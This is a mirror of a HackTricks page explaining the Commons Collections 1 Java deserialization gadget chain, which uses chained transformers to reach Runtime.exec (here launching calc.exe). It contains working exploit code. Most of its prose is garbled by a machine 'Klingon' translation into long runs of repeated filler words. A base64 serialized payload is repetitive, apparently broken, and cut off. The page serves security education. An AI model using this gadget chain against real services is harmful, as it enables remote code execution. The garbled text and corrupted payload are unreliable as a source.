Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00

Translator workflow b442ae90c4 Translated to Klingon

2024-02-10 17:52:19 +00:00

48 KiB

Raw Permalink Blame History

CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs
Get the official PEASS & HackTricks swag
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

Java Transformers to Rutime exec()

In several places you can find a java deserialization payload that uses transformers from Apache common collections like the following one:

import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.util.HashMap;

public class CommonsCollections1PayloadOnly {
public static void main(String... args) {
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class), //(1)
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
), //(2)
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
), //(3)
new InvokerTransformer("exec",
new Class[]{String.class},
command
) //(4)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);

//Execute gadgets
lazyMap.get("anything");
}
}

qaStaHvIS java deserialization payloads Daqaw'a' 'e' vItlhutlh. 'Ivqu' java Transformer class ghItlh 'ej ghItlh 'e' transform.
Payload executed equivalent 'e' interesting to know that:

import java.io.*;
import java.util.Base64;

public class Main {
    public static void main(String[] args) throws Exception {
        String payload = "rO0ABXNyAB5qYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvcmllcwEABmJpbmFyeVN0cmVhbXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABnJ1bGVzY2FwZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAB3N0YWNrVHJhbnNwb3J0ABBMamF2YS91dGlsL1RocmVhZDt4cHNyACBqYXZhLnV0aWwuSGFzaE1hcJAAAAAAAAAABDAAVAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAADAAAAAQAAABAAAAAIAAAABAAAAAQAAAAUAAAAGAAAAAQAAABwAAAABAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAA
```java
Runtime.getRuntime().exec(new String[]{"calc.exe"});

vaj vItlhutlh vaj vItlhutlh, nuq vItlhutlh vaj vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh **

((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});

Qatlh

So, Qatlh je first payload presented equivalent to those "simple" one-liners?

First of all, Qatlh can notice in the payload that a chain (array) of transforms are created:

String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
//(1) - Get gadget Class (from Runtime class)
new ConstantTransformer(Runtime.class),

//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
),

//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
),

//(4) - Use the Runtime object to call exec with arbitrary commands
new InvokerTransformer("exec",
new Class[]{String.class},
command
)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

qaStaHvIS: ghorghDI' code vItlhutlhchuq, vaj vaj jatlhpu' 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'e' vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej 